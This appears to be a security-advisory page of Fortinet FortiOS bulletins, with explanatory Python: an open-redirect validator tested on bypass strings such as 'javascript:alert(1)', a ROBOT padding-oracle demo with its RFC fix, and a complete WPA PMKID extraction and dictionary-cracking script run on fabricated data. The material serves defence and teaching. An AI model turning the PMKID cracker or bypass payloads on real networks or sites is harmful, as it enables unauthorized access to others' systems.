The Vigil@nce team watches public vulnerabilities impacting your computers, and then offers security solutions, a database and tools to fix them.

Computer vulnerabilities of FG

computer vulnerability alert CVE-2018-13384

Fortinet FortiOS: open redirect via the VPN portal

Synthesis of the vulnerability

An attacker can deceive the user via the VPN portal of Fortinet FortiOS, in order to redirect him to a malicious site.
Impacted products: FortiGate, FortiGate Virtual Appliance, FortiOS.
Severity: 1/4.
Consequences: user access/rights, data reading.
Provenance: internet client.
Creation date: 22/05/2019.
Identifiers: CVE-2018-13384, FG-IR-19-002, VIGILANCE-VUL-29386.

Description of the vulnerability

The VPN portal of Fortinet FortiOS redirects the browser to a target taken from the request without checking that the target stays on the portal itself. An attacker can therefore build a link that points at the legitimate, trusted portal host but lands the user on a site of the attacker's choice, which makes phishing for VPN credentials far more convincing than a link to an unknown host.
Full Vigil@nce bulletin... (Free trial)
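The fix for any open redirect is the same whatever the product: validate the requested target server-side before issuing the 302. The check below is an added example written for this page, not FortiOS code and not taken from the Fortinet advisory; the host name `vpn.example.com`, the landing path `/remote/login` and the parameter handling are hypothetical. It shows the unchecked ("vulnerable") resolver beside a hardened one that rejects the usual bypasses (absolute URLs, scheme-relative `//host`, backslash variants, userinfo tricks, `javascript:` and control characters).

```python
from urllib.parse import urlsplit

# Hypothetical deployment values for the example: the host(s) the portal is served from.
ALLOWED_HOSTS = {"vpn.example.com"}
DEFAULT_LANDING = "/remote/login"  # hypothetical page to fall back to


def resolve_redirect_vulnerable(requested: str) -> str:
    """The open-redirect pattern: whatever the request says, that is where we send the browser."""
    return requested


def is_safe_redirect(target: str, allowed_hosts: set) -> bool:
    """Return True only if `target` keeps the user on one of `allowed_hosts`.

    Bypasses handled: "https://evil.example", scheme-relative "//evil.example",
    backslash variants "/\\evil.example" (browsers treat "\\" as "/"),
    userinfo tricks "https://vpn.example.com@evil.example", non-http schemes
    such as "javascript:", and control/whitespace characters that make the
    validator and the browser parse different URLs.
    """
    if not target:
        return False
    if any(ord(c) <= 0x20 or ord(c) == 0x7F for c in target):
        return False
    target = target.replace("\\", "/")
    parts = urlsplit(target)
    if parts.scheme or parts.netloc:
        # Absolute or scheme-relative URL: only https to our own host is acceptable.
        host = (parts.hostname or "").lower()
        return parts.scheme == "https" and host in allowed_hosts
    # Relative target: a single-slash path, never "//host" (which is scheme-relative).
    return target.startswith("/") and not target.startswith("//")


def resolve_redirect(requested: str, allowed_hosts: set = ALLOWED_HOSTS,
                     default: str = DEFAULT_LANDING) -> str:
    """Hardened resolver: honour the requested target only when it is safe, else go to the default."""
    return requested if is_safe_redirect(requested, allowed_hosts) else default


if __name__ == "__main__":
    for candidate in ["/remote/portal", "//evil.example/", "/\\evil.example/",
                      "https://vpn.example.com@evil.example/", "javascript:alert(1)"]:
        print(f"{candidate!r:45} -> {resolve_redirect(candidate)}")
```

Compare by host name (`parts.hostname`), not by the raw `netloc`, so that credentials and port tricks in the authority part cannot smuggle a foreign host past an exact-match check. An allow-list of relative paths is stricter still and is the better choice when the portal never legitimately redirects off-host.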

vulnerability CVE-2018-12126 CVE-2018-12127 CVE-2018-12130

Intel processors: information disclosure via performance measurement

Synthesis of the vulnerability

An attacker can measure the performance of his own process, in order to get sensitive information about other processes or, if the host is virtualized, about other guest systems.
Impacted products: XenServer, Debian, Fedora, FortiAnalyzer, FortiGate, FortiManager, FortiOS, FreeBSD, Linux, Windows 10, Windows 2008 R0, Windows 2008 R2, Windows 2012, Windows 2016, Windows 2019, Windows 7, Windows 8, Windows RT, OpenBSD, openSUSE Leap, PAN-OS, pfSense, RHEL, SIMATIC, SUSE Linux Enterprise Desktop, SLES, Synology DSM, Synology DS***, Synology RS***, Ubuntu, ESXi, vCenter Server, VMware vSphere Hypervisor, Xen.
Severity: 1/4.
Consequences: data reading.
Provenance: user shell.
Number of vulnerabilities in this bulletin: 4.
Creation date: 15/05/2019.
Revision date: 15/05/2019.
Identifiers: CERTFR-2019-AVI-209, CERTFR-2019-AVI-211, CERTFR-2019-AVI-212, CERTFR-2019-AVI-213, CERTFR-2019-AVI-215, CERTFR-2019-AVI-217, CERTFR-2019-AVI-229, CERTFR-2019-AVI-230, CERTFR-2019-AVI-233, CERTFR-2019-AVI-311, CTX251995, CVE-2018-12126, CVE-2018-12127, CVE-2018-12130, CVE-2019-11091, DLA-1787-1, DLA-1789-1, DLA-1789-2, DLA-1799-1, DLA-1799-2, DSA-4444-1, DSA-4447-1, DSA-4447-2, FEDORA-2019-0731828893, FEDORA-2019-1f5832fc0e, FEDORA-2019-640f8d8dd1, FEDORA-2019-6458474bf2, FEDORA-2019-c36afa818c, FEDORA-2019-e6bf55e821, FEDORA-2019-eb08fb0c5f, FG-IR-18-002, FreeBSD-SA-19:07.mds, INTEL-SA-00233, openSUSE-SU-2019:1402-1, openSUSE-SU-2019:1403-1, openSUSE-SU-2019:1404-1, openSUSE-SU-2019:1405-1, openSUSE-SU-2019:1407-1, openSUSE-SU-2019:1408-1, openSUSE-SU-2019:1419-1, openSUSE-SU-2019:1420-1, openSUSE-SU-2019:1468-1, openSUSE-SU-2019:1505-1, PAN-SA-2019-0012, RHSA-2019:1155-01, RHSA-2019:1167-01, RHSA-2019:1168-01, RHSA-2019:1169-01, RHSA-2019:1170-01, RHSA-2019:1171-01, RHSA-2019:1172-01, RHSA-2019:1174-01, RHSA-2019:1175-01, RHSA-2019:1176-01, RHSA-2019:1177-01, RHSA-2019:1178-01, RHSA-2019:1180-01, RHSA-2019:1181-01, RHSA-2019:1182-01, RHSA-2019:1183-01, RHSA-2019:1184-01, RHSA-2019:1185-01, RHSA-2019:1186-01, RHSA-2019:1187-01, RHSA-2019:1188-01, RHSA-2019:1189-01, RHSA-2019:1190-01, RHSA-2019:1193-01, RHSA-2019:1194-01, RHSA-2019:1195-01, RHSA-2019:1196-01, RHSA-2019:1197-01, RHSA-2019:1198-01, SSA-616472, SUSE-SU-2019:1235-1, SUSE-SU-2019:1236-1, SUSE-SU-2019:1238-1, SUSE-SU-2019:1239-1, SUSE-SU-2019:1240-1, SUSE-SU-2019:1241-1, SUSE-SU-2019:1242-1, SUSE-SU-2019:1243-1, SUSE-SU-2019:1244-1, SUSE-SU-2019:1245-1, SUSE-SU-2019:1248-1, SUSE-SU-2019:1268-1, SUSE-SU-2019:1269-1, SUSE-SU-2019:1272-1, SUSE-SU-2019:1287-1, SUSE-SU-2019:1289-1, SUSE-SU-2019:1296-1, SUSE-SU-2019:1313-1, SUSE-SU-2019:1347-1, SUSE-SU-2019:1348-1, SUSE-SU-2019:1349-1, SUSE-SU-2019:1356-1, SUSE-SU-2019:1371-1, SUSE-SU-2019:14048-1, SUSE-SU-2019:14051-1, SUSE-SU-2019:14052-1, 
SUSE-SU-2019:14063-1, SUSE-SU-2019:1423-1, SUSE-SU-2019:1438-1, SUSE-SU-2019:1452-1, SUSE-SU-2019:1490-1, SUSE-SU-2019:1547-1, SUSE-SU-2019:1550-1, Synology-SA-19:24, USN-3977-1, USN-3977-2, USN-3977-3, USN-3978-1, USN-3979-1, USN-3980-1, USN-3981-1, USN-3981-2, USN-3982-1, USN-3982-2, USN-3983-1, USN-3983-2, USN-3984-1, USN-3985-1, USN-3985-2, VIGILANCE-VUL-29300, VMSA-2019-0008, XSA-297, ZombieLoad.

Description of the vulnerability

These are the Microarchitectural Data Sampling (MDS) flaws in Intel processors (INTEL-SA-00233, publicly known as ZombieLoad). Data still in flight in internal CPU buffers (store buffer, fill buffer, load port) can be forwarded to a speculatively executed load running in another security context, and the attacker recovers it through a cache-timing side channel on his own process. A local attacker who can run code, including code inside a guest virtual machine, can thereby read fragments of memory belonging to other processes, the kernel, the hypervisor or other guests sharing the same physical core. Mitigation requires both a microcode update (so the buffers can be flushed) and operating-system or hypervisor updates that flush them on context switches and VM exits; hyper-threading siblings remain exposed unless SMT is disabled.

computer vulnerability CVE-2018-13371

FortiOS: privilege escalation via ZebOS Routing Settings Change

Synthesis of the vulnerability

An attacker can bypass restrictions via ZebOS Routing Settings Change of FortiOS, in order to escalate his privileges.
Impacted products: FortiGate, FortiGate Virtual Appliance, FortiOS.
Severity: 2/4.
Consequences: privileged access/rights, data creation/edition.
Provenance: user account.
Creation date: 04/04/2019.
Identifiers: CERTFR-2019-AVI-147, CVE-2018-13371, FG-IR-18-230, VIGILANCE-VUL-28945.

Description of the vulnerability

An authenticated FortiOS user whose account should not be allowed to change routing can nevertheless modify ZebOS routing settings, and so obtain rights beyond those assigned to his account and alter the device's routing configuration.

vulnerability announce CVE-2017-17544

FortiOS: privilege escalation via Restoring Modified Configurations

Synthesis of the vulnerability

An attacker can bypass restrictions via Restoring Modified Configurations of FortiOS, in order to escalate his privileges.
Impacted products: FortiGate, FortiGate Virtual Appliance, FortiOS.
Severity: 1/4.
Consequences: administrator access/rights, privileged access/rights.
Provenance: privileged account.
Creation date: 03/04/2019.
Identifiers: CERTFR-2019-AVI-143, CVE-2017-17544, FG-IR-17-053, VIGILANCE-VUL-28932.

Description of the vulnerability

An administrator with restricted privileges on FortiOS can restore a configuration file that has been modified outside the device, and the restore operation applies settings that his account should not be allowed to change, up to full administrator access.

computer vulnerability alert 28906

FortiOS: information disclosure via HTTP Headers Parsing

Synthesis of the vulnerability

An attacker can bypass access restrictions to data via HTTP Headers Parsing of FortiOS, in order to obtain sensitive information.
Impacted products: FortiGate, FortiGate Virtual Appliance, FortiOS.
Severity: 2/4.
Consequences: data reading.
Provenance: intranet client.
Creation date: 01/04/2019.
Identifiers: CERTFR-2019-AVI-137, FG-IR-19-043, VIGILANCE-VUL-28906.

Description of the vulnerability

An attacker can bypass access restrictions to data via HTTP Headers Parsing of FortiOS, in order to obtain sensitive information.

vulnerability alert CVE-2018-13376

FortiOS: information disclosure via Web Proxy Disclaimer Response

Synthesis of the vulnerability

A local attacker can read a memory fragment via Web Proxy Disclaimer Response of FortiOS, in order to obtain sensitive information.
Impacted products: FortiGate, FortiGate Virtual Appliance, FortiOS.
Severity: 1/4.
Consequences: data reading.
Provenance: user shell.
Creation date: 23/11/2018.
Identifiers: CERTFR-2018-AVI-570, CVE-2018-13376, FG-IR-18-325, VIGILANCE-VUL-27871.

Description of the vulnerability

A local attacker can read a memory fragment via Web Proxy Disclaimer Response of FortiOS, in order to obtain sensitive information.

computer vulnerability announce CVE-2018-13366

FortiGate: information disclosure via PPTP Server Hostname

Synthesis of the vulnerability

An attacker can bypass access restrictions to data via PPTP Server Hostname of FortiGate, in order to obtain sensitive information.
Impacted products: FortiGate, FortiGate Virtual Appliance, FortiOS.
Severity: 2/4.
Consequences: data reading.
Provenance: intranet client.
Creation date: 19/11/2018.
Identifiers: CERTFR-2018-AVI-560, CVE-2018-13366, FG-IR-18-101, VIGILANCE-VUL-27827.

Description of the vulnerability

An attacker can bypass access restrictions to data via PPTP Server Hostname of FortiGate, in order to obtain sensitive information.

computer vulnerability alert CVE-2018-13374

FortiGate: privilege escalation via LDAP Server Connectivity

Synthesis of the vulnerability

An attacker can bypass restrictions via LDAP Server Connectivity of FortiGate, in order to escalate his privileges.
Impacted products: FortiGate, FortiGate Virtual Appliance, FortiOS.
Severity: 1/4.
Consequences: privileged access/rights, data reading.
Provenance: privileged account.
Creation date: 19/11/2018.
Identifiers: CERTFR-2018-AVI-560, CVE-2018-13374, FG-IR-18-157, VIGILANCE-VUL-27826.

Description of the vulnerability

An attacker holding a privileged (but not fully administrative) FortiGate account can point the LDAP server connectivity test at a server he controls. The device then authenticates to that rogue server with the LDAP bind credentials configured on the FortiGate, which the attacker captures and can reuse to escalate his privileges.

vulnerability bulletin 27203

WPA/WPA2: information disclosure via PSK PMKID

Synthesis of the vulnerability

An attacker can bypass access restrictions to data via PSK PMKID of WPA/WPA2, in order to obtain sensitive information.
Impacted products: FortiGate, FortiGate Virtual Appliance, FortiOS, 802.11 protocol.
Severity: 2/4.
Consequences: data reading.
Provenance: radio connection.
Creation date: 11/09/2018.
Identifiers: FG-IR-18-199, VIGILANCE-VUL-27203.

Description of the vulnerability

In WPA/WPA2-PSK networks the access point can include a PMKID in the first message of the 4-way handshake (the RSN PMKID key data element). The PMKID is HMAC-SHA1-128(PMK, "PMK Name" || AP MAC || client MAC), and the PMK is derived from the pre-shared key and the SSID with PBKDF2. An attacker within radio range therefore only has to start an association with the access point to obtain the PMKID, without any legitimate client being present and without capturing a complete handshake, and can then brute-force the pre-shared key offline.
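The computation above is short enough to show end to end. The following is an added example written for this page (it is not Fortinet code and not part of the bulletin): it derives the PMK and PMKID exactly as the standard defines them, parses the PMKID out of a constructed EAPOL-Key message 1 key data field, and runs the offline dictionary attack. The SSID, MAC addresses, passphrase and word list are all made up for the example; the key data is fabricated by the same functions, not a real capture.

```python
import hashlib
import hmac
from typing import Optional

RSN_OUI = b"\x00\x0f\xac"


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def compute_pmkid(pmk: bytes, mac_ap: bytes, mac_sta: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AA || SPA): the first 16 bytes of the HMAC."""
    return hmac.new(pmk, b"PMK Name" + mac_ap + mac_sta, hashlib.sha1).digest()[:16]


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", "").replace("-", ""))


def build_pmkid_kde(pmkid: bytes) -> bytes:
    """RSN PMKID KDE as the AP places it in the key data of EAPOL-Key message 1:
    type 0xDD, length 0x14, OUI 00:0F:AC, data type 4, then the 16-byte PMKID."""
    return b"\xdd" + bytes([4 + len(pmkid)]) + RSN_OUI + b"\x04" + pmkid


def extract_pmkid(key_data: bytes) -> Optional[bytes]:
    """Walk the TLV-encoded key data field and return the PMKID if a PMKID KDE is present."""
    i = 0
    while i + 2 <= len(key_data):
        kde_type, length = key_data[i], key_data[i + 1]
        body = key_data[i + 2:i + 2 + length]
        if kde_type == 0xDD and length == 20 and body[:3] == RSN_OUI and body[3] == 0x04:
            return body[4:]
        i += 2 + length
    return None


def crack_pmkid(pmkid: bytes, ssid: str, mac_ap: str, mac_sta: str, wordlist) -> Optional[str]:
    """Offline dictionary attack: one PBKDF2 and one HMAC per candidate, no client traffic needed."""
    aa, spa = mac_bytes(mac_ap), mac_bytes(mac_sta)
    for candidate in wordlist:
        if hmac.compare_digest(compute_pmkid(derive_pmk(candidate, ssid), aa, spa), pmkid):
            return candidate
    return None


# --- Constructed sample for the example (not a real capture) ---------------------
SSID = "CorpWiFi"
AP_MAC = "02:00:00:aa:bb:cc"        # the AP's BSSID (locally administered address)
STA_MAC = "02:00:00:11:22:33"       # the attacker's own adapter, echoed by the AP
REAL_PASSPHRASE = "hunter2hunter2"  # used only to fabricate what the AP would send
# Key data as the AP would send it in message 1; a zero-length padding KDE follows the PMKID.
CAPTURED_KEY_DATA = build_pmkid_kde(
    compute_pmkid(derive_pmk(REAL_PASSPHRASE, SSID), mac_bytes(AP_MAC), mac_bytes(STA_MAC))
) + b"\xdd\x00"
WORDLIST = ["password", "letmein", "CorpWiFi2018", "hunter2hunter2", "qwertyuiop"]


def demo() -> Optional[str]:
    """Parse the PMKID out of the captured key data and recover the PSK from the word list."""
    pmkid = extract_pmkid(CAPTURED_KEY_DATA)
    return None if pmkid is None else crack_pmkid(pmkid, SSID, AP_MAC, STA_MAC, WORDLIST)


if __name__ == "__main__":
    print("recovered PSK:", demo())
```

The cost per guess is dominated by the 4096-round PBKDF2, which is why the only effective defence on a PSK network is a long random passphrase (or moving to WPA2-Enterprise/WPA3); nothing about the attack depends on a client being present, so monitoring for deauthentication frames does not detect it.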

vulnerability announce CVE-2018-9192 CVE-2018-9194

FortiOS: information disclosure via ROBOT Attack

Synthesis of the vulnerability

An attacker can bypass access restrictions to data via ROBOT Attack (VIGILANCE-VUL-24749) of FortiOS, in order to obtain sensitive information.
Impacted products: FortiGate, FortiGate Virtual Appliance, FortiOS.
Severity: 2/4.
Consequences: data reading.
Provenance: internet client.
Number of vulnerabilities in this bulletin: 2.
Creation date: 06/09/2018.
Identifiers: CVE-2018-9192, CVE-2018-9194, FG-IR-17-302, VIGILANCE-VUL-27172.

Description of the vulnerability

The TLS implementation of FortiOS reacts to malformed RSA PKCS#1 v1.5 padding in a way that a network attacker can tell apart from the well-formed case (ROBOT, Return Of Bleichenbacher's Oracle Threat, VIGILANCE-VUL-24749). By sending many crafted ClientKeyExchange messages and observing the server's responses, the attacker obtains a padding oracle that lets him decrypt a previously recorded RSA key exchange, and hence that session's traffic, or produce a signature with the server's private RSA key. Only cipher suites using RSA key exchange are affected; (EC)DHE suites, which provide forward secrecy, are not.
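What turns a padding check into an oracle is easiest to see on the unpadding step itself. The example below is added for this page and is not FortiOS code or anything from the Fortinet advisory: it places a decoder that fails early with a distinct error for each condition (the behaviour ROBOT exploits) next to the TLS 1.2 countermeasure (RFC 5246 section 7.4.7.1), which on any failure silently substitutes a random premaster secret so the handshake fails later at Finished exactly as it would for a well-formed but wrong ciphertext. The RSA step is omitted: the probes are constructed plaintext blocks standing in for what raw decryption of attacker-chosen ciphertexts could produce, and the 1024-bit key size is an assumption.

```python
import secrets

K = 128                        # modulus length in bytes for an assumed 1024-bit RSA key
CLIENT_VERSION = b"\x03\x03"   # TLS 1.2 as announced in ClientHello


class BadPadding(Exception):
    """Raised by the vulnerable decoder; the message is what a careless server leaks."""


def unpad_pkcs1_v15_vulnerable(em: bytes, k: int) -> bytes:
    """Decode EM = 0x00 || 0x02 || PS || 0x00 || M after raw RSA decryption.

    Each check fails separately and early. If a server exposes these outcomes
    (different alerts, different timing, TCP reset vs. alert), an attacker learns
    whether a chosen ciphertext decrypts to a block beginning 0x00 0x02, which
    is exactly the Bleichenbacher oracle.
    """
    if len(em) != k:
        raise BadPadding("wrong length")
    if em[0] != 0x00 or em[1] != 0x02:
        raise BadPadding("bad block type")
    sep = em.find(b"\x00", 2)
    if sep == -1:
        raise BadPadding("no separator")
    if sep - 2 < 8:
        raise BadPadding("padding string shorter than 8 bytes")
    return em[sep + 1:]


def vulnerable_server(em: bytes, k: int, client_version: bytes) -> bytes:
    """A ROBOT-affected server: every failure is a distinct, immediately visible error."""
    pms = unpad_pkcs1_v15_vulnerable(em, k)
    if len(pms) != 48 or pms[:2] != client_version:
        raise BadPadding("bad premaster secret")
    return pms


def hardened_server(em: bytes, k: int, client_version: bytes) -> bytes:
    """RFC 5246 7.4.7.1 behaviour: always return a 48-byte premaster secret.

    Any padding, length or version failure yields random bytes instead of an
    error. (A real implementation must also avoid data-dependent timing; this
    shows the logic, not constant-time code.)
    """
    fallback = secrets.token_bytes(48)
    pms = b""
    if len(em) == k and em[:2] == b"\x00\x02":
        sep = em.find(b"\x00", 2)
        if sep >= 10:               # at least 8 bytes of padding string
            pms = em[sep + 1:]
    if len(pms) != 48 or pms[:2] != client_version:
        return fallback
    return pms


def observe(server, em: bytes, k: int, client_version: bytes) -> str:
    """What a network attacker can distinguish: the error class, or a continuing handshake."""
    try:
        server(em, k, client_version)
        return "continue"
    except BadPadding as exc:
        return f"alert:{exc}"


def distinguishable_outcomes(server, probes, k: int, client_version: bytes) -> set:
    return {observe(server, em, k, client_version) for em in probes}


def make_em(pms: bytes, k: int = K) -> bytes:
    """Correctly padded block 0x00 0x02 || PS || 0x00 || pms, with non-zero PS."""
    ps_len = k - 3 - len(pms)
    assert ps_len >= 8
    return b"\x00\x02" + b"\x41" * ps_len + b"\x00" + pms


GOOD_PMS = CLIENT_VERSION + bytes(range(46))
# Constructed probes: blocks that raw RSA decryption of attacker-chosen ciphertexts might yield.
PROBES = [
    make_em(GOOD_PMS),                                          # valid
    b"\x00\x01" + make_em(GOOD_PMS)[2:],                        # wrong block type
    b"\x00\x02" + b"\x41" * (K - 2),                            # no separator
    b"\x00\x02" + b"\x41" * 3 + b"\x00" + b"\x42" * (K - 6),    # padding string too short
    make_em(b"\x03\x01" + bytes(range(46))),                    # right padding, wrong version
]


def demo():
    """Return (outcomes seen against the vulnerable server, outcomes seen against the hardened one)."""
    return (distinguishable_outcomes(vulnerable_server, PROBES, K, CLIENT_VERSION),
            distinguishable_outcomes(hardened_server, PROBES, K, CLIENT_VERSION))


if __name__ == "__main__":
    vulnerable, hardened = demo()
    print("vulnerable server exposes:", sorted(vulnerable))
    print("hardened server exposes:  ", sorted(hardened))
```

The hardened server collapses all five probes into the single outcome "continue", so the attacker gains no bit of information per query; the vulnerable one leaks a different outcome for each condition. On an appliance the operational fix is the vendor patch plus disabling RSA key exchange cipher suites in favour of (EC)DHE, which removes the oracle's value even if a timing difference remains.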